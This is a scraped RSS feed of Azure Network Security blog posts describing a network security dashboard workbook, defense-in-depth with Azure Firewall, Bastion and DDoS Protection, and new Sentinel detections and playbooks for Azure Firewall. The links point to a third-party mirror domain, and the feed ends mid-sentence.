Azure Network Security articles https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/bg-p/AzureNetworkSecurityBlog Azure Network Security articles Thu, 28 Oct 2021 09:09:39 GMT AzureNetworkSecurityBlog 2021-10-28T09:09:39Z Introducing the Network Security Dashboard for Azure Security Center https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-network-security-dashboard-for-azure-security/ba-p/2779842 <H2>&nbsp;</H2> <P><SPAN>Written in collaboration with <LI-USER uid="7427"></LI-USER>&nbsp;</SPAN><SPAN>(Program Manager,&nbsp;</SPAN><SPAN>Azure Security Center Product Team)</SPAN></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P>Microsoft Azure enables you to deploy a variety of infrastructure, web application and automation resources.&nbsp; These resources are generally a part of a larger infrastructure or an application service that your organization provides to its internal and external users.&nbsp; In addition to the networking endpoints of an overarching service that your users interact with, the different resources in an infrastructure or application service interact with each other through their own networking endpoints.&nbsp; These interactions depend on the underlying networking services provided by the Azure cloud to communicate with other tiers and with its users.&nbsp; This communication internally within Azure and to Azure from external networks is protected with resource specific ACLs and with the cloud native network security services such as DDoS Protection, Web Application Firewall (WAF), Network Security Groups (NSG) and Firewall in Azure.&nbsp; With all network security controls in place, and each one implemented in a different dashboard, it becomes challenging for customers to have a single view of their entire Azure Network Security state, and that is what this workbook aims to solve.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Current Challenge</H2> <P>&nbsp;</P> <P>As your footprint in the Azure Cloud grows, the number of services and the infrastructure, application and automation resources involved in these services increases significantly which results in the number of endpoints which are exposed internally and externally, with or without the required security controls.&nbsp;&nbsp;<STRONG>This represents the attack surface of your organization which can be exploited by an attacker</STRONG>.&nbsp; To appropriately secure your attack surface, you require better monitoring and governance of your resources, services, and their endpoints.&nbsp; The first step in this process is to inventory and gain visibility into the networking and security configuration your endpoints across your environment, along with the network security services they utilize or those which maybe inline.&nbsp; This helps you understand all the different paths an attacker can utilize to compromise your boundary and infiltrate into your environment plus the protections you already have against or those that need to put in place to prevent them.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Proposed Solution</H2> <P>&nbsp;</P> <P>Up until now, there was no single view with which you could visualize all your externally or internally exposed endpoints, their networking and security configuration or the network security services you had setup in Azure.&nbsp; You had to browse through many different blades in Azure to assess and obtain this information.&nbsp; With the availability of the new Network Security Dashboard for Security Center, you can now quickly get real time visibility of the security configuration of your networking and network security services, across multiple subscriptions in Azure.<BR /><BR /></P> <P><STRONG>The Network Security Dashboard is free to use for all customers and does not require you to be a paid customer of Azure Security Center.</STRONG></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>What’s in the Dashboard</H2> <P>&nbsp;</P> <P>The new Network Security Dashboard for Security Center provides a unified view and deep visibility into the configuration of your overall networking, and network security services in Azure. &nbsp;If you have been actively using Security Center and Network Security features in Azure, this dashboard is for you!<BR /><BR /></P> <P>The dashboard is powered by Azure Resource Graph (ARG) queries and divided into different sections as explained below:<BR /><BR /></P> <P>&nbsp;</P> <UL> <LI><STRONG>Overview:</STRONG>&nbsp;summary view of all your network security and networking resources for selected subscription(s)</LI> <LI><STRONG>Public IPs &amp; exposed ports:</STRONG>&nbsp;ports exposed to the internet and mapping of public IPs to asset types</LI> <LI><STRONG>Network security services:</STRONG>&nbsp;DDoS protections plans, Azure Firewall and Firewall policies, Azure WAF policies and NSG views</LI> <LI><STRONG>Internal networking mapping:</STRONG>&nbsp;network interfaces, route tables, private links, and virtual networks with DDoS protection status (including subnets and peering)</LI> <LI><STRONG>Gateway and VPN services:</STRONG>&nbsp;consolidated view of Bastion hosts, VPN gateways, Virtual Network Gateways and Express Route circuits</LI> <LI><STRONG>Traffic Manager:</STRONG>&nbsp;details of all your traffic manager profiles</LI> <LI><STRONG>Security Center recommendations:</STRONG>&nbsp;filtered view of all ASC network related recommendations including resource count, severity, and security control<BR /><BR /></LI> </UL> <P><STRONG>Informational options </STRONG>can be accessed&nbsp;using the action bars at the top section, select FAQ button to show the frequently asked questions. You can also see recent changes documented on the change log option.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How to Deploy</H2> <P>&nbsp;</P> <P>The Network Security Dashboard is available in the Azure Security Center GitHub Repo page, under Workbooks and can be accessed directly with its direct URL: <A href="#" target="_blank" rel="noopener">https://aka.ms/DeployNetSecWorkbook</A></P> <P>The workbook can be deployed quickly in the Azure Commercial and Gov cloud environments by clicking the respective “Deploy to Azure” buttons on the workbook page.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Deploy-NetworkSecurityDashboard-Edited-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312511i4125608793888E8B/image-size/large?v=v2&amp;px=999" role="button" title="Deploy-NetworkSecurityDashboard-Edited-Final.gif" alt="Deploying Network Security Dashboard" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Network Security Dashboard</span></span></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How Does it Work</H2> <P>&nbsp;</P> <P>The Network Security Dashboard is a workbook in Azure Security Center.&nbsp; The workbook is based on Azure Resource Graph (ARG) queries which retrieve real time configuration data of your resources, networking and network security services deployed across multiple subscriptions in Azure.&nbsp; The workbook can be edited, and all queries can be modified to meet your needs.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How to Use</H2> <P>&nbsp;</P> <P>To use this dashboard, you need at least Reader permission at the subscription level. Assuming you have the required permissions, watch the screen capture below to learn about how to navigate through and use the dashboard.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="HowToUse-NetworkSecurityDashboard-Edited-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312512iB70BA89B4D608DB0/image-size/large?v=v2&amp;px=999" role="button" title="HowToUse-NetworkSecurityDashboard-Edited-Final.gif" alt="Using Network Security Dashboard" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Using Network Security Dashboard</span></span></P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Conclusion</H2> <P>&nbsp;</P> <P>The Network Security dashboard provides valuable information about your attack surface in Azure.&nbsp; The workbook is available to all customers free of charge and does not require you to be a paid customer of ASC.<BR /><BR /></P> <P>We will continue to add support for additional Azure Network Security and networking products to the workbook in future.&nbsp; You will find information about all future revisions and currently planned future updates in the <A href="#" target="_blank" rel="noopener">Upcoming Changes</A> section on the GitHub page for the workbook.&nbsp; You can also <A href="#" target="_blank" rel="noopener">contribute</A> to the workbook by joining the community and following the guidance.</P> <H2>&nbsp;</H2> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Additional Resources</H2> <P>&nbsp;</P> <UL> <LI>To learn more about Azure Security Center, visit: <A href="#" target="_blank" rel="noopener">https://aka.ms/ascninja</A></LI> <LI>To learn more about Azure Network Security, visit:&nbsp;&nbsp;<A href="#" target="_blank" rel="noopener">https://aka.ms/AzNetSecNinja</A></LI> <LI>To deploy or learn more about the Network Security Dashboard, visit: <A href="#" target="_blank" rel="noopener">https://aka.ms/DeployNetSecWorkbook</A></LI> <LI>To learn about ASC workbooks, visit: &nbsp;<SPAN><A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/custom-dashboards-azure-workbooks</A></SPAN></LI> <LI>To learn about ARG, visit:&nbsp; <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/governance/resource-graph/</A> <H2><BR /><BR /><BR /></H2> </LI> </UL> <P class="lia-indent-padding-left-30px"><STRONG>Reviewers:<BR /><LI-USER uid="124214"></LI-USER><SPAN>,&nbsp;Principal PM (Azure Security Center CxE)</SPAN></STRONG></P> <P class="lia-indent-padding-left-30px"><STRONG><LI-USER uid="324143"></LI-USER>, Senior Product Marketing Manager (Azure Marketing)&nbsp;</STRONG></P> <H2 class="lia-indent-padding-left-30px">&nbsp;</H2> <H2 class="lia-indent-padding-left-30px"><STRONG>&nbsp;<BR /></STRONG></H2> Wed, 06 Oct 2021 17:15:42 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/introducing-the-network-security-dashboard-for-azure-security/ba-p/2779842 Mohit_Kumar 2021-10-06T17:15:42Z Improve your Azure Network Infrastructure Security with Complementary Services https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/improve-your-azure-network-infrastructure-security-with/ba-p/2697246 <P>Given the rising number of cyber-attacks and data breaches in recent times, security has become paramount. For a while now, it’s been clear that securing only your network’s perimeter is simply not enough. The idea that we can inherently trust systems or users in “internal networks” is a recipe for disaster.&nbsp; Not to mention, it’s likely that many of your systems and users are not even in an internal network anymore.</P> <P>&nbsp;</P> <P>In this ever-changing world, attackers are constantly finding new ways to exploit vulnerabilities. This is one of the reasons to consider the strategy of defense-in-depth: if there are multiple layers of protection in place and one of them fails, another security mechanism exists to stand in the way of an attack.</P> <P>&nbsp;</P> <P>Besides a multi-layered approach to security, having a <A href="#" target="_blank" rel="noopener">Zero Trust</A> mindset is important. We focus on three principles when pursuing Zero Trust practices: verify explicitly, use least privileged access, and assume breach.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="ZTNetSecDiagram.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306588i1CAF3817E5E97678/image-size/large?v=v2&amp;px=999" role="button" title="ZTNetSecDiagram.jpg" alt="ZTNetSecDiagram.jpg" /></span></P> <P>&nbsp;</P> <P><STRONG>Do you want to segment your cloud resources and protect against malicious traffic flows?</STRONG></P> <P>&nbsp;</P> <P>Ensuring that the systems and resources are well segmented is foundational in network security. However, resources have legitimate reasons to communicate with one another. How can we detect and prevent threats across the resources that are segmented but need to communicate?</P> <P>&nbsp;</P> <P>With <A href="#" target="_blank" rel="noopener">Azure Firewall</A>, you can keep your virtual networks (VNETs) segmented in a <A href="#" target="_blank" rel="noopener">hub-and-spoke architecture</A> model. The Azure Firewall is responsible for enforcing rules centrally, allowing or denying traffic that flows to and from resources in VNETs. However, the resources may still need to communicate over the network.</P> <P>&nbsp;</P> <P>For connections that are allowed, Azure Firewall helps you <STRONG>explicitly verify</STRONG> the security of these connections with <A href="#" target="_blank" rel="noopener">Threat Intelligence</A>-based filtering and <A href="#" target="_blank" rel="noopener">Intrusion Detection and Prevention System (IDPS)</A>. Allowed connections should not be blindly trusted: by <STRONG>assuming breach</STRONG>, we can watch out for potential attacks occurring within our networks. Threat Intelligence actively looks for connections to malicious IPs or domains, taking action to block that traffic even if it was allowed in the first place. IDPS offers an <STRONG>extra layer of defense</STRONG>, allowing for rapid detection of attacks by looking for specific patterns, such as byte sequences in network traffic, or known malicious instruction sequences used by malware.</P> <P>&nbsp;</P> <P><STRONG>Do you want administrators to manage resources securely from any device and any location, while minimizing attack surface?</STRONG></P> <P>&nbsp;</P> <P>Most of our administrators are no longer in our data centers where they can physically manage systems. The mentality of allowing administrators access to manage resources solely based on their network location does not align with our reality anymore, neither should we expose our systems to the public internet so that administrators can manage them on-the-go.</P> <P>&nbsp;</P> <P>Most common needs for secure administration include strong authentication mechanisms, minimized direct exposure to the internet, and control over how and when administrators access resources. With <A href="#" target="_blank" rel="noopener">Azure Bastion</A>, you can keep virtual machines in Azure completely private and still allow administrators to manage them from any device and any location. In this scenario, virtual machines are managed via Azure Portal with Azure Bastion. This method <STRONG>explicitly verifies</STRONG> credentials before each connection, and <A href="#" target="_blank" rel="noopener">multi-factor authentication</A>, <A href="#" target="_blank" rel="noopener">least privilege access controls</A> and <A href="#" target="_blank" rel="noopener">conditional access policies</A> can be configured and enforced to provide <STRONG>multi-layered protection</STRONG> against potential administrative exploitations.</P> <P>&nbsp;</P> <P><STRONG>Do you want to have resilient resources that are up-and-running, even when under attack?</STRONG></P> <P>&nbsp;</P> <P>We want to ensure that our services are resilient and available to our users as much as possible. Even if attackers are trying to disrupt the availability of our services, we need the ability to <STRONG>explicitly verify</STRONG> which connections are coming from legitimate users and which ones are malicious.</P> <P>&nbsp;</P> <P>With <A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A>, mitigation of distributed denial-of-service (DDoS) attacks are auto-tuned to the capacity of your resources. When an attack is detected, mitigation starts automatically. It identifies which packets are coming from attackers and drops those connections, while legitimate packets are forwarded to your services, minimizing the impact to valid users while an attack is occurring.</P> <P>&nbsp;</P> <P><STRONG>How do these services work together to improve overall network security?</STRONG></P> <P>&nbsp;</P> <P>Based on what we explored above, we saw how Azure Bastion and Azure Firewall are essential services to securely manage our resources and catch malicious traffic activity in our networks. Since Azure Bastion and Azure Firewall are services that can have public IP addresses, they may be susceptible to DDoS attacks. With Azure DDoS Protection Standard, we can stand against DDoS attacks that could potentially impact the availability of these crucial security services. Azure DDoS Protection acts as an insurance to keep critical infrastructure running even in the event of an attack.</P> <P>&nbsp;</P> <P><STRONG>Next Steps</STRONG></P> <P>&nbsp;</P> <UL> <LI>Deploy our <A href="#" target="_blank" rel="noopener">Network Security Dashboard</A> workbook for <A href="#" target="_blank" rel="noopener">Azure Security Center</A> to gain visibility of your Public IPs assets and better gauge your level of exposure.</LI> <LI>Follow this <A href="#" target="_blank" rel="noopener">Azure Bastion QuickStart</A> tutorial to configure Azure Bastion&nbsp;and test how you can manage a virtual machine (VM) securely without needing direct public access to the VM.</LI> <LI>Deploy our <A href="#" target="_blank" rel="noopener">Azure Network Security Lab</A> from GitHub for hands-on testing of Azure Firewall and Azure DDoS Protection Standard.</LI> </UL> <P>&nbsp;</P> <P><STRONG>References</STRONG></P> <P>&nbsp;</P> <UL> <LI><A href="#" target="_blank" rel="noopener">Azure DDoS Protection Standard</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Firewall</A></LI> <LI><A href="#" target="_blank" rel="noopener">Azure Bastion</A></LI> </UL> Tue, 31 Aug 2021 20:23:42 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/improve-your-azure-network-infrastructure-security-with/ba-p/2697246 camilamartins 2021-08-31T20:23:42Z New Detections, Hunting Queries and Response Automation in Azure Firewall Solution for Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-hunting-queries-and-response-automation-in-azure/ba-p/2688746 <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener">Recent breaches</A> surface the need for all organizations to adopt an assume breach mindset to security.&nbsp; While organizations continue to invest heavily in the products and technology to prevent breaches, having automated threat detection and response capabilities to identify malicious actors and actions in your environment has become the need of the hour.&nbsp; To enable these capabilities at scale, organizations need to have cutting-edge monitoring and response tools along with the detection logic to identify threats.</P> <P>&nbsp;</P> <P>The cloud native Azure Firewall provides protection against network-based threats. &nbsp;Azure Sentinel is the cloud native SIEM and SOAR solution which provides threat detection, hunting, and automated response capabilities for Azure Firewall.&nbsp; While this is great, customers must go through multiple blades and steps in Azure Sentinel to deploy and configure all the detections, hunting queries, workbooks, and automation, which can be an overhead.</P> <P>&nbsp;</P> <P>Readers of this post will hopefully be aware of the ever-growing integration between Azure Firewall and Azure Sentinel<STRONG><SUP>1</SUP></STRONG>.&nbsp; At Microsoft, we continue to innovate best security detection and response experiences for you, and we are excited to present the <STRONG>Azure Firewall Solution for Azure Sentinel</STRONG>, as announced in the blog post <A href="#" target="_blank" rel="noopener">Optimize security with Azure Firewall solution for Azure Sentinel</A><STRONG><SUP>2</SUP></STRONG>.&nbsp; The Azure Firewall Solution<STRONG> provides Azure Firewall specific net new detections and hunting queries</STRONG>.&nbsp; The solution also contains a new firewall workbook and automation components, which can now be deployed in a single, streamlined method.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG><SUP>1</SUP></STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958" target="_blank" rel="noopener">New Detections for Azure Firewall in Azure Sentinel</A></FONT></P> <P><FONT size="2"><STRONG><SUP>1</SUP></STRONG> <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbook</A></FONT></P> <P><FONT size="2"><STRONG><SUP>2 </SUP></STRONG>Azure Sentinel Solutions announced in the RSA 2021 conference <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/rsa-conference-2021-new-innovations-for-azure-sentinel/ba-p/2346834" target="_blank" rel="noopener">RSA Conference 2021: New innovations for Azure Sentinel</A> and in the blog post <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/introducing-azure-sentinel-solutions/ba-p/2347312" target="_blank" rel="noopener">Introducing Azure Sentinel Solutions!</A></FONT></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Scenario</H2> <P>&nbsp;</P> <P>In case of an attack from an external adversary or malicious activity in a trusted network, the traffic representing the anomaly must inevitably flow through the network where it will be processed and logged by network devices such as Azure Firewall.&nbsp; While real time threat detection and prevention features such as IDPS etc. can enable you to take actions for the traffic patterns in question ahead of time, there will be scenarios which require a fine gained evaluation before making decisions to block traffic.&nbsp; This is where Azure Firewall detections and hunting queries in Azure Sentinel provide you with a method to detect threats and respond to them automatically.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>What’s New</H2> <P>&nbsp;</P> <P>The Azure Firewall Solution provides new threat detections, hunting queries, a new firewall workbook and response automation as packaged content.&nbsp; This enables you to find the appropriate solution easily and then deploy all the components in the solution in a single step from the Solutions blade in Azure Sentinel.</P> <P>&nbsp;</P> <P>Below are the details of the components included in the Firewall Solution:<BR /><BR /></P> <P>&nbsp;</P> <OL> <LI>New Analytic Rule based detections:<BR /><BR /> <TABLE border="1" width="99.67811158798285%"> <TBODY> <TR> <TD width="14.27038626609442%"> <P><STRONG>Detection rule</STRONG></P> </TD> <TD width="36.48068669527897%"> <P><STRONG>What does it do?</STRONG></P> </TD> <TD width="48.927038626609445%"> <P><STRONG>What does it indicate?</STRONG></P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Port scan</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies a source IP scanning open ports on or through the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious scanning of ports by an attacker, trying to reveal open ports in the organization that can be compromised for initial access.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Port sweep</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies a source IP scanning an open port on different IPs through the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious scanning of a port by an attacker trying to reveal IPs with specific vulnerable ports open in the organization.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Abnormal deny rate for source IP</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies an abnormal deny rate for a specific source IP to a destination IP based on machine learning done during a configured period.</P> </TD> <TD width="48.927038626609445%"> <P>Potential exfiltration, initial access, or C2, where an attacker tries to exploit the same vulnerability on machines in the organization but is being blocked by the Azure Firewall rules.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Abnormal Port to protocol</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies communication for a well-known protocol over a non-standard port based on machine learning done during an activity period.</P> </TD> <TD width="48.927038626609445%"> <P>Malicious communication (C2) or exfiltration by attackers trying to communicate over known ports (SSH, HTTP) but don’t use the known protocol headers that match the port number.</P> </TD> </TR> <TR> <TD width="14.27038626609442%"> <P><STRONG>Multiple sources affected by the same TI destination</STRONG></P> </TD> <TD width="36.48068669527897%"> <P>Identifies multiple machines that are trying to reach out to the same destination blocked by threat intelligence (TI) in the Azure Firewall.</P> </TD> <TD width="48.927038626609445%"> <P>An attack on the organization by the same attack group trying to exfiltrate data from the organization.</P> </TD> </TR> </TBODY> </TABLE> <BR /><BR /></LI> <LI>New Hunting Queries:<BR /><BR /> <TABLE border="1" width="99.78540772532189%"> <TBODY> <TR> <TD width="14.914163090128755%"> <P><STRONG>Hunting query</STRONG></P> </TD> <TD width="36.05150214592275%"> <P><STRONG>What does it do?</STRONG></P> </TD> <TD width="48.81974248927038%"> <P><STRONG>What is it based on? What does it indicate?</STRONG></P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>First time a source IP connects to destination port</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Helps to identify a common indication of an attack (IOA) when a new host or IP tries to communicate with a destination using a specific port.</P> </TD> <TD width="48.81974248927038%"> <P>Based on learning the regular traffic during a specified period.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>First time source IP connects to a destination</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Helps to identify an IOA when malicious communication is done for the first time from machines that never accessed the destination before.</P> </TD> <TD width="48.81974248927038%"> <P>Based on learning the regular traffic during a specified period.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Source IP abnormally connects to multiple destinations</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies a source IP that abnormally connects to multiple destinations.</P> </TD> <TD width="48.81974248927038%"> <P>Indicates initial access attempts by attackers trying to jump between different machines in the organization, exploiting lateral movement path or the same vulnerability on different machines to find vulnerable machines to access.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Uncommon port for the organization</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies abnormal ports used in the organization network.</P> </TD> <TD width="48.81974248927038%"> <P>An attacker can bypass monitored ports and send data through uncommon ports. This allows the attackers to evade detection from routine detection systems.</P> </TD> </TR> <TR> <TD width="14.914163090128755%"> <P><STRONG>Uncommon port connection to destination IP</STRONG></P> </TD> <TD width="36.05150214592275%"> <P>Identifies abnormal ports used by machines to connect to a destination IP.</P> </TD> <TD width="48.81974248927038%"> <P>An attacker can bypass monitored ports and send data through uncommon ports. This can also indicate an exfiltration attack from machines in the organization by using a port that has never been used on the machine for communication.</P> </TD> </TR> </TBODY> </TABLE> <BR /><BR /></LI> <LI>A single Sentinel Workbook which supports the Azure Firewall Standard and Premium SKUs<BR /><BR /><BR /></LI> <LI>Custom Logic App Connector and three new Playbooks Templates for Azure Firewall<BR /><BR /> <TABLE border="1" width="99.78540772532187%"> <TBODY> <TR> <TD width="38.0901287553648%"> <P><STRONG>Connector and Playbooks</STRONG></P> </TD> <TD width="61.69527896995708%"> <P><STRONG>What does it do?</STRONG></P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>Azure Firewall Connector</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>The connector allows you to take many different actions against Azure Firewall, Firewall Policy, and IP Groups.&nbsp; A full list of actions supported by the connector is available <A href="#" target="_blank" rel="noopener">here </A></P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-BlockIP-addToIPGroup</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows you to block IP addresses in Azure Firewall by adding them to <STRONG>IP Groups </STRONG>based on analyst decision. &nbsp;It allows you to make changes on IP Groups, which are attached to firewall rules, instead of making changes directly to the Azure Firewall. &nbsp;The target IP Group could be associated with policy/rules used in one or more firewalls</P> <P>&nbsp;</P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-AddIPtoTIAllowList</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows the SOC to automatically respond to Azure Sentinel incidents which includes a destination IP address, by adding the specific IP to the Threat Intelligence (TI) Allow list in Azure Firewall</P> </TD> </TR> <TR> <TD width="38.0901287553648%"> <P><STRONG>AzureFirewall-BlockIP-addNewRule</STRONG></P> </TD> <TD width="61.69527896995708%"> <P>This playbook allows you to block an IP address by adding a new network rule with the specific IP to an existing Deny Network Rule Collection in Azure Firewall</P> </TD> </TR> </TBODY> </TABLE> </LI> </OL> <P><STRONG>Notes</STRONG>:</P> <OL class="lia-list-style-type-lower-roman"> <LI><EM>To learn more about the Azure Firewall Logic App Connector and Playbooks, please refer to this blog post: </EM><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener"><EM>Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks </EM></A></LI> <LI><EM>The detections, hunting queries and the firewall workbook included in the solution are based on KQL and you can modify them to meet your specific requirements.&nbsp; The Firewall Playbooks can also be customized by adding or removing workflows, based on your needs</EM></LI> </OL> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>How to Deploy</H2> <P>&nbsp;</P> <P>You must have Azure Firewall Standard or Premium with Firewall Policy or Classic Rules, and Azure Sentinel deployed in your environment to use the solution.&nbsp; In order to use the response automation capabilities provided by the Azure Firewall Logic App Connector and Playbooks included in the solution, prior to deploying the solution, you must complete the pre-requisites provided in the detailed step by step guide is available here <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/automated-detection-and-response-for-azure-firewall-with-the-new/ba-p/2414224" target="_blank" rel="noopener">Automated Detection and Response for Azure Firewall with the New Logic App Connector and Playbooks</A>.</P> <P><STRONG><BR />Note</STRONG>: <EM>You may skip configuration of the Azure Firewall Connector and Playbooks pre-requisites, if you are not planning to use the response automation features at the time of deploying the Firewall Solution</EM></P> <P>&nbsp;</P> <P>The Azure Firewall solution can be deployed quickly from the Solutions (Preview) gallery in Azure Sentinel.&nbsp; There are no other prerequisites to deploy and start using the Analytic Rule based detections, Hunting Queries, and the Firewall Workbook included in the solution package.&nbsp; Please see the screen capture below for a step-by-step process to deploy the firewall solution.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="DeployAzureFirewallSolution-RAW2-Edited7-Final.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/306060iB1F418A373583E2B/image-size/large?v=v2&amp;px=999" role="button" title="DeployAzureFirewallSolution-RAW2-Edited7-Final.gif" alt="Deploying Azure Firewall Solution for Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Deploying Azure Firewall Solution for Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <P>&nbsp;</P> <H2>How to Configure Solution Components in Azure</H2> <P>&nbsp;</P> <P>After you have successfully deployed the Azure Firewall solution, please use the instructions below to enable and configure the different components of the solution.&nbsp;</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Firewall Workbook</H3> <P>&nbsp;</P> <P>Use the following instructions to launch and configure the Azure Firewall Workbook deployed by the solution.<BR /><BR /></P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Workbooks </STRONG>node</LI> <LI>In the Workbooks blade, click on <STRONG>My workbooks </STRONG>tab</LI> <LI>Click to select the “Azure Firewall” workbook in the <STRONG>My workbooks </STRONG>blade</LI> <LI>In the right pane (Customer defined workbook), click <STRONG>View saved workbook </STRONG>button</LI> </OL> <P>&nbsp;</P> <P>You can now select the appropriate timeframe and firewalls to visualize the logs in the different tabs of the Workbook.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><EM><A href="#" target="_blank" rel="noopener"><FONT size="2">Visualize your data using Azure Monitor Workbooks in Azure Sentinel | Microsoft Docs</FONT></A></EM></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Hunting Queries</H3> <P>&nbsp;</P> <P>Use the following instructions to run the Azure Firewall Hunting Queries deployed by the solution.</P> <P>&nbsp;</P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Hunting </STRONG>node</LI> <LI>In the Hunting blade, click the checkbox to select one or multiple queries deployed by the solution <UL> <LI>If you have many preexisting queries, click the <STRONG>Add filter</STRONG> button and then filter on <STRONG>Provider = Custom Queries</STRONG></LI> </UL> </LI> <LI>Click the <STRONG>Run selected queries </STRONG>button on the top to run</LI> <LI>You will see the results of the query in <STRONG>Results </STRONG>column of the queries</LI> </OL> <P>&nbsp;</P> <P>To see detailed results of a query run, click to select the query and click the <STRONG>View results </STRONG>button in the right pane.&nbsp; This will open the Log Analytics workspace where you can modify the query to drill deeper into the logs.&nbsp; The query logic can be modified and saved for future use.</P> <P>&nbsp;</P> <P><FONT size="2"><STRONG>Reference</STRONG>: </FONT><A href="#" target="_blank" rel="noopener"><EM><FONT size="2">Hunting capabilities in Azure Sentinel | Microsoft Docs</FONT></EM></A></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H3>Analytic Rules</H3> <P>&nbsp;</P> <P>Use the following instructions to enable and configure the Analytic Rule based detections deployed by the solution.</P> <P>&nbsp;</P> <OL> <LI>Browse over to the Azure Sentinel blade</LI> <LI>In the left pane, click on the <STRONG>Analytics </STRONG>node</LI> <LI>In the Analytics blade, click the checkbox to select one or multiple detection rules deployed by the solution and click the <STRONG>Enable </STRONG>button to enable the detection rule(s) <UL> <LI>Detection rules deployed by the solution are disabled by default</LI> </UL> </LI> <LI>To update the detection logic or the trigger threshold, click to select a detection rule and then click <STRONG>Edit</STRONG> in the right pane</LI> <LI>The detection logic can be modified in the <STRONG>Set rule logic</STRONG> tab and saved for future use</LI> </OL> <P>&nbsp;</P> <P>Now that the solution has been deployed and all components have been enabled/configured successfully, you can use the Firewall 